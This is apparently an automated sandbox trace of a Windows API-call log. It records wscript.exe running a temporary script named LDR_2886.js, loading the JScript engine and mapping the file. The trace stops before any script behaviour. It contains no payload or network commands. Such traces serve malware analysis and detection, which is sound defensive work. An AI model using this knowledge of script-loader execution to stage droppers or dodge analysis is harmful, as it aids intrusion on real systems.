	[0149.894] RegCloseKey (hKey=0x304) returned 0x0
	[0149.894] LocalFree (hMem=0x2f38c0) returned 0x0
	[0149.894] RegCloseKey (hKey=0x328) returned 0x0
	[0165.681] RegCloseKey (hKey=0x31c) returned 0x0
	[0203.525] RegCloseKey (hKey=0x38c) returned 0x0
	[0203.526] RegCloseKey (hKey=0x370) returned 0x0
	[0203.526] RegCloseKey (hKey=0x36c) returned 0x0
	[0203.526] RegCloseKey (hKey=0x368) returned 0x0
	[0203.526] RegCloseKey (hKey=0x364) returned 0x0
	[0203.527] RegCloseKey (hKey=0x360) returned 0x0
	[0203.527] RegCloseKey (hKey=0x35c) returned 0x0
	[0203.527] RegCloseKey (hKey=0x338) returned 0x0
	[0203.527] RegCloseKey (hKey=0x388) returned 0x0
	[0203.527] RegCloseKey (hKey=0x354) returned 0x0
	[0203.528] RegCloseKey (hKey=0x350) returned 0x0
	[0203.528] RegCloseKey (hKey=0x34c) returned 0x0
	[0203.528] RegCloseKey (hKey=0x348) returned 0x0
	[0203.528] RegCloseKey (hKey=0x344) returned 0x0
	[0203.529] RegCloseKey (hKey=0x340) returned 0x0
	[0203.529] RegCloseKey (hKey=0x33c) returned 0x0
	[0203.529] RegCloseKey (hKey=0x384) returned 0x0
	[0203.529] RegCloseKey (hKey=0x380) returned 0x0
	[0203.529] RegCloseKey (hKey=0x1d0) returned 0x0
	[0203.530] RegCloseKey (hKey=0x30c) returned 0x0
	[0203.530] RegCloseKey (hKey=0x308) returned 0x0
	[0203.530] RegCloseKey (hKey=0x304) returned 0x0
	[0203.530] RegCloseKey (hKey=0x328) returned 0x0
	[0203.530] RegCloseKey (hKey=0x320) returned 0x0
	[0203.531] RegCloseKey (hKey=0x31c) returned 0x0
	[0203.531] RegCloseKey (hKey=0x160) returned 0x0
	[0203.531] RegCloseKey (hKey=0x198) returned 0x0
	[0203.531] RegCloseKey (hKey=0x37c) returned 0x0
	[0203.531] RegCloseKey (hKey=0x378) returned 0x0
	[0203.531] RegCloseKey (hKey=0x358) returned 0x0

Thread:
	id = 225
	os_tid = 0xbbc


Process:
	id = "15"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x523ac000"
	os_pid = "0x1ec"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 133
	os_tid = 0x478

	[0067.580] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd10 | out: lpSystemTimeAsFileTime=0x22fd10*(dwLowDateTime=0xa0c0a030, dwHighDateTime=0x1d543d1)) 
	[0067.580] GetCurrentProcessId () returned 0x1ec
	[0067.580] GetCurrentThreadId () returned 0x478
	[0067.581] GetTickCount () returned 0x21ab0
	[0067.581] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd18 | out: lpPerformanceCount=0x22fd18*=19200664493) returned 1
	[0067.581] GetStartupInfoA (in: lpStartupInfo=0x22fd30 | out: lpStartupInfo=0x22fd30*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0067.582] GetModuleHandleA (lpModuleName=0x0) returned 0xffdb0000
	[0067.582] GetModuleHandleA (lpModuleName=0x0) returned 0xffdb0000
	[0067.582] GetVersionExA (in: lpVersionInformation=0x22fc50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3b1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22fc50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0067.582] GetUserDefaultLCID () returned 0x409
	[0067.583] CoInitialize (pvReserved=0x0) returned 0x0
	[0067.595] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0067.595] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0067.595] ??2@YAPEAX_K@Z () returned 0x2b57b0
	[0067.596] ??2@YAPEAX_K@Z () returned 0x2b5f60
	[0067.596] GetCurrentThreadId () returned 0x478
	[0067.596] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f998 | out: phkResult=0x22f998*=0x7c) returned 0x0
	[0067.596] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f990 | out: phkResult=0x22f990*=0x80) returned 0x0
	[0067.596] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x22ec98, lpData=0x22f0a0, lpcbData=0x22ec90*=0x400 | out: lpType=0x22ec98*=0x0, lpData=0x22f0a0*=0x67, lpcbData=0x22ec90*=0x400) returned 0x2
	[0067.596] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x22ec98, lpData=0x22f0a0, lpcbData=0x22ec90*=0x400 | out: lpType=0x22ec98*=0x0, lpData=0x22f0a0*=0x67, lpcbData=0x22ec90*=0x400) returned 0x2
	[0067.596] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x22ec98, lpData=0x22f0a0, lpcbData=0x22ec90*=0x400 | out: lpType=0x22ec98*=0x0, lpData=0x22f0a0*=0x67, lpcbData=0x22ec90*=0x400) returned 0x2
	[0067.596] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0067.890] RegCloseKey (hKey=0x80) returned 0x0
	[0067.890] RegCloseKey (hKey=0x7c) returned 0x0
	[0067.890] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f6b0 | out: phkResult=0x22f6b0*=0x7c) returned 0x0
	[0067.890] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f6a8 | out: phkResult=0x22f6a8*=0x80) returned 0x0
	[0067.890] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x22e9b8, lpData=0x22edc0, lpcbData=0x22e9b0*=0x400 | out: lpType=0x22e9b8*=0x0, lpData=0x22edc0*=0x0, lpcbData=0x22e9b0*=0x400) returned 0x2
	[0067.890] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x22e9b8, lpData=0x22edc0, lpcbData=0x22e9b0*=0x400 | out: lpType=0x22e9b8*=0x0, lpData=0x22edc0*=0x0, lpcbData=0x22e9b0*=0x400) returned 0x2
	[0067.890] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x22e9b8, lpData=0x22edc0, lpcbData=0x22e9b0*=0x400 | out: lpType=0x22e9b8*=0x0, lpData=0x22edc0*=0x0, lpcbData=0x22e9b0*=0x400) returned 0x2
	[0067.890] RegCloseKey (hKey=0x80) returned 0x0
	[0067.890] RegCloseKey (hKey=0x7c) returned 0x0
	[0067.890] GetACP () returned 0x4e4
	[0067.890] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0067.890] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0067.890] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0067.890] FreeLibrary (hLibModule=0x77040000) returned 1
	[0067.890] ??2@YAPEAX_K@Z () returned 0x2b5f80
	[0067.891] CoRegisterMessageFilter (in: lpMessageFilter=0x2b5f80, lplpMessageFilter=0x2b5f90 | out: lplpMessageFilter=0x2b5f90*=0x0) returned 0x0
	[0067.891] GetModuleFileNameW (in: hModule=0xffdb0000, lpFilename=0x22f9f0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0067.892] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x22f340 | out: lpdwHandle=0x22f340) returned 0x704
	[0067.892] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x22ec30 | out: lpData=0x22ec30) returned 1
	[0067.892] VerQueryValueW (in: pBlock=0x22ec30, lpSubBlock="\\", lplpBuffer=0x22f348, puLen=0x22f344 | out: lplpBuffer=0x22f348*=0x22ec58, puLen=0x22f344) returned 1
	[0067.892] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f398 | out: phkResult=0x22f398*=0x7c) returned 0x0
	[0067.892] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x22e6e8, lpData=0x22eaf0, lpcbData=0x22e6e0*=0x400 | out: lpType=0x22e6e8*=0x0, lpData=0x22eaf0*=0x0, lpcbData=0x22e6e0*=0x400) returned 0x2
	[0067.892] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f350 | out: phkResult=0x22f350*=0x80) returned 0x0
	[0067.892] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x22f314, lpData=0x22f390, lpcbData=0x22f310*=0x4 | out: lpType=0x22f314*=0x0, lpData=0x22f390*=0xc0, lpcbData=0x22f310*=0x4) returned 0x2
	[0067.892] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x22e6e8, lpData=0x22eaf0, lpcbData=0x22e6e0*=0x400 | out: lpType=0x22e6e8*=0x0, lpData=0x22eaf0*=0x0, lpcbData=0x22e6e0*=0x400) returned 0x2
	[0067.892] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x22f314, lpData=0x22f390, lpcbData=0x22f310*=0x4 | out: lpType=0x22f314*=0x0, lpData=0x22f390*=0xc0, lpcbData=0x22f310*=0x4) returned 0x2
	[0067.892] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x22e6e8, lpData=0x22eaf0, lpcbData=0x22e6e0*=0x400 | out: lpType=0x22e6e8*=0x1, lpData="1", lpcbData=0x22e6e0*=0x4) returned 0x0
	[0067.893] lstrlenW (lpString="1") returned 1
	[0067.893] lstrlenW (lpString="0") returned 1
	[0067.893] lstrlenW (lpString="1") returned 1
	[0067.893] lstrlenW (lpString="no") returned 2
	[0067.893] lstrlenW (lpString="1") returned 1
	[0067.893] lstrlenW (lpString="false") returned 5
	[0067.893] RegCloseKey (hKey=0x80) returned 0x0
	[0067.893] RegCloseKey (hKey=0x7c) returned 0x0
	[0067.893] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x22f398, lpdwDisposition=0x0 | out: phkResult=0x22f398*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0067.893] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x22f334, lpData=0x22f390, lpcbData=0x22f330*=0x4 | out: lpType=0x22f334*=0x0, lpData=0x22f390*=0xc0, lpcbData=0x22f330*=0x4) returned 0x2
	[0067.893] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x22e708, lpData=0x22eb10, lpcbData=0x22e700*=0x400 | out: lpType=0x22e708*=0x1, lpData="1", lpcbData=0x22e700*=0x4) returned 0x0
	[0067.893] lstrlenW (lpString="1") returned 1
	[0067.893] lstrlenW (lpString="0") returned 1
	[0067.893] lstrlenW (lpString="1") returned 1
	[0067.893] lstrlenW (lpString="no") returned 2
	[0067.893] lstrlenW (lpString="1") returned 1
	[0067.893] lstrlenW (lpString="false") returned 5
	[0067.893] RegCloseKey (hKey=0x7c) returned 0x0
	[0067.893] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x22f398, lpdwDisposition=0x0 | out: phkResult=0x22f398*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0067.893] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x22f334, lpData=0x22f390, lpcbData=0x22f330*=0x4 | out: lpType=0x22f334*=0x0, lpData=0x22f390*=0xc0, lpcbData=0x22f330*=0x4) returned 0x2
	[0067.893] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x22e708, lpData=0x22eb10, lpcbData=0x22e700*=0x400 | out: lpType=0x22e708*=0x0, lpData=0x22eb10*=0x31, lpcbData=0x22e700*=0x400) returned 0x2
	[0067.893] RegCloseKey (hKey=0x7c) returned 0x0
	[0067.893] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0067.893] lstrlenW (lpString="js") returned 2
	[0067.893] lstrlenW (lpString="WSH") returned 3
	[0067.894] ??2@YAPEAX_K@Z () returned 0x2b5870
	[0067.894] LoadStringW (in: hInstance=0xffdb0000, uID=0x9c5, lpBuffer=0x22de00, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0067.894] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x22ee40*=0x0 | out: pptlib=0x22ee40*=0x3dd100) returned 0x0
	[0067.899] ITypeLib:GetTypeInfoOfGuid (in: This=0x3dd100, GUID=0xffdb58f0, ppTInfo=0x22ee28 | out: ppTInfo=0x22ee28*=0x3de4e8) returned 0x0
	[0067.901] ITypeInfo:GetRefTypeOfImplType (in: This=0x3de4e8, index=0xffffffff, pRefType=0x22ee20 | out: pRefType=0x22ee20*=0xfffffffe) returned 0x0
	[0067.901] ITypeInfo:GetRefTypeInfo (in: This=0x3de4e8, hreftype=0xfffffffe, ppTInfo=0xffdcf458 | out: ppTInfo=0xffdcf458*=0x3de540) returned 0x0
	[0067.901] IUnknown:Release (This=0x3de4e8) returned 0x1
	[0067.901] ??2@YAPEAX_K@Z () returned 0x2b5900
	[0067.902] ??2@YAPEAX_K@Z () returned 0x2b59a0
	[0067.902] ??2@YAPEAX_K@Z () returned 0x2b5a00
	[0067.902] ITypeLib:GetTypeInfoOfGuid (in: This=0x3dd100, GUID=0xffdb5950, ppTInfo=0x22ee28 | out: ppTInfo=0x22ee28*=0x3de598) returned 0x0
	[0067.902] ITypeInfo:GetRefTypeOfImplType (in: This=0x3de598, index=0xffffffff, pRefType=0x22ee20 | out: pRefType=0x22ee20*=0xfffffffe) returned 0x0
	[0067.902] ITypeInfo:GetRefTypeInfo (in: This=0x3de598, hreftype=0xfffffffe, ppTInfo=0xffdcf4d8 | out: ppTInfo=0xffdcf4d8*=0x3de5f0) returned 0x0
	[0067.902] IUnknown:Release (This=0x3de598) returned 0x1
	[0067.902] ITypeLib:GetTypeInfoOfGuid (in: This=0x3dd100, GUID=0xffdb5960, ppTInfo=0x22ee28 | out: ppTInfo=0x22ee28*=0x3de648) returned 0x0
	[0067.902] ITypeInfo:GetRefTypeOfImplType (in: This=0x3de648, index=0xffffffff, pRefType=0x22ee20 | out: pRefType=0x22ee20*=0xfffffffe) returned 0x0
	[0067.902] ITypeInfo:GetRefTypeInfo (in: This=0x3de648, hreftype=0xfffffffe, ppTInfo=0xffdcf518 | out: ppTInfo=0xffdcf518*=0x3de6a0) returned 0x0
	[0067.902] IUnknown:Release (This=0x3de648) returned 0x1
	[0067.902] ITypeLib:GetTypeInfoOfGuid (in: This=0x3dd100, GUID=0xffdb5910, ppTInfo=0x22ee28 | out: ppTInfo=0x22ee28*=0x3de6f8) returned 0x0
	[0067.902] ITypeInfo:GetRefTypeOfImplType (in: This=0x3de6f8, index=0xffffffff, pRefType=0x22ee20 | out: pRefType=0x22ee20*=0xfffffffe) returned 0x0
	[0067.902] ITypeInfo:GetRefTypeInfo (in: This=0x3de6f8, hreftype=0xfffffffe, ppTInfo=0xffdcf498 | out: ppTInfo=0xffdcf498*=0x3de750) returned 0x0
	[0067.902] IUnknown:Release (This=0x3de6f8) returned 0x1
	[0067.902] IUnknown:Release (This=0x3dd100) returned 0x4
	[0067.902] ??2@YAPEAX_K@Z () returned 0x2b5a60
	[0067.902] GetCurrentThreadId () returned 0x478
	[0067.902] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0067.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffdc1cf8, lpParameter=0x2b5a60, dwCreationFlags=0x0, lpThreadId=0x2b5a88 | out: lpThreadId=0x2b5a88*=0xb08) returned 0xd4
	[0067.903] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x22f080*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0067.935] CloseHandle (hObject=0xcc) returned 1
	[0067.935] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x22f110, lpFilePart=0x22f100 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x22f100*="LDR_2886.js") returned 0x30
	[0067.936] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e620 | out: phkResult=0x22e620*=0xe6) returned 0x0
	[0067.936] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x22e5d0, lpData=0x22e630, lpcbData=0x22e5d4*=0x800 | out: lpType=0x22e5d0*=0x1, lpData="JSFile", lpcbData=0x22e5d4*=0xe) returned 0x0
	[0067.936] RegCloseKey (hKey=0xe6) returned 0x0
	[0067.936] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e620 | out: phkResult=0x22e620*=0xe6) returned 0x0
	[0067.936] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x22e5d0, lpData=0x22eea0, lpcbData=0x22e5d4*=0x200 | out: lpType=0x22e5d0*=0x1, lpData="JScript", lpcbData=0x22e5d4*=0x10) returned 0x0
	[0067.936] RegCloseKey (hKey=0xe6) returned 0x0
	[0067.936] ??2@YAPEAX_K@Z () returned 0x2b63a0
	[0067.937] GetProcessHeap () returned 0x3b0000
	[0067.937] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x2000) returned 0x3e8430
	[0067.937] CLSIDFromString (in: lpsz="JScript", pclsid=0x22ee18 | out: pclsid=0x22ee18*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0067.937] CoCreateInstance (in: rclsid=0x22ee18*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffdb1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ee10 | out: ppv=0x22ee10*=0x2b6780) returned 0x0
	[0067.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22d010 | out: lpSystemTimeAsFileTime=0x22d010*(dwLowDateTime=0xa0f75fd0, dwHighDateTime=0x1d543d1)) 
	[0067.948] GetCurrentProcessId () returned 0x1ec
	[0067.948] GetCurrentThreadId () returned 0x478
	[0067.948] GetTickCount () returned 0x21c17
	[0067.948] QueryPerformanceCounter (in: lpPerformanceCount=0x22d018 | out: lpPerformanceCount=0x22d018*=19237375087) returned 1
	[0067.948] malloc (_Size=0x100) returned 0x2b6670
	[0067.948] __dllonexit () returned 0x7fee1410728
	[0067.948] __dllonexit () returned 0x7fee1410780
	[0067.948] __dllonexit () returned 0x7fee1410750
	[0067.949] __dllonexit () returned 0x7fee14107b0
	[0067.949] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0067.949] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0067.949] EtwRegisterTraceGuidsA () returned 0x0
	[0067.949] EtwRegisterTraceGuidsA () returned 0x0
	[0067.949] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22cc00, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0067.950] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0067.950] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x22cd68 | out: phkResult=0x22cd68*=0x0) returned 0x2
	[0067.956] GetVersion () returned 0x1db10106
	[0067.956] ??2@YAPEAX_K@Z () returned 0x2b5aa0
	[0067.957] ??2@YAPEAX_K@Z () returned 0x2b6780
	[0067.957] GetUserDefaultLCID () returned 0x409
	[0067.957] GetACP () returned 0x4e4
	[0067.957] ??3@YAXPEAX@Z () returned 0x64fac301
	[0067.957] GetCurrentThreadId () returned 0x478
	[0067.957] ??2@YAPEAX_K@Z () returned 0x2b5aa0
	[0067.957] GetCurrentThreadId () returned 0x478
	[0067.957] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x22ed48 | out: phkResult=0x22ed48*=0x104) returned 0x0
	[0067.958] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0067.958] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x22ed40, lpData=0x22ed38, lpcbData=0x22ed30*=0x4 | out: lpType=0x22ed40*=0x4, lpData=0x22ed38*=0x1, lpcbData=0x22ed30*=0x4) returned 0x0
	[0067.958] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0067.958] RegCloseKey (hKey=0x104) returned 0x0
	[0067.958] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0067.958] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0067.958] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0067.958] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0067.958] CoCreateInstance (in: rclsid=0x7fee147cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee147cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ed10 | out: ppv=0x22ed10*=0x7fefec0a1b0) returned 0x0
	[0067.959] ??2@YAPEAX_K@Z () returned 0x2b6b30
	[0067.959] ??2@YAPEAX_KHPEBDH@Z () returned 0x2b5af0
	[0067.959] ??2@YAPEAX_K@Z () returned 0x2b6bf0
	[0067.959] ??2@YAPEAX_K@Z () returned 0x2b6c50
	[0067.960] ??2@YAPEAX_K@Z () returned 0x2b7140
	[0067.960] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x22ecd0, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0067.960] GetUserDefaultLCID () returned 0x409
	[0067.960] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0067.960] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x22ed70, cchData=6 | out: lpLCData="1252") returned 5
	[0067.960] IsValidCodePage (CodePage=0x4e4) returned 1
	[0067.960] CoCreateInstance (in: rclsid=0x7fee1475d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee1475d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2b6af0 | out: ppv=0x2b6af0*=0x3e75b0) returned 0x0
	[0067.961] IUnknown:AddRef (This=0x3e75b0) returned 0x2
	[0067.961] GetCurrentProcessId () returned 0x1ec
	[0067.961] GetCurrentThreadId () returned 0x478
	[0067.961] GetTickCount () returned 0x21c27
	[0067.961] ISystemDebugEventFire:BeginSession (This=0x3e75b0, guidSourceID=0x7fee1475da8, strSessionName="JScript:00000492:00001144:18138279") returned 0x0
	[0067.961] GetCurrentThreadId () returned 0x478
	[0067.961] ??2@YAPEAX_K@Z () returned 0x2b71e0
	[0067.961] ??2@YAPEAX_K@Z () returned 0x2b7230
	[0067.961] malloc (_Size=0x80) returned 0x2b72e0
	[0067.961] malloc (_Size=0x108) returned 0x2b7370
	[0067.961] GetTickCount () returned 0x21c27
	[0067.961] GetCurrentThreadId () returned 0x478
	[0067.961] ??2@YAPEAX_K@Z () returned 0x2b7480
	[0067.961] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0067.961] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0067.961] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0067.961] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000
	[0067.962] GetVersionExA (in: lpVersionInformation=0x22ef20*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22ef20*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0067.962] IsTextUnicode (in: lpv=0x110000, iSize=19304, lpiResult=0x22ef10 | out: lpiResult=0x22ef10) returned 0
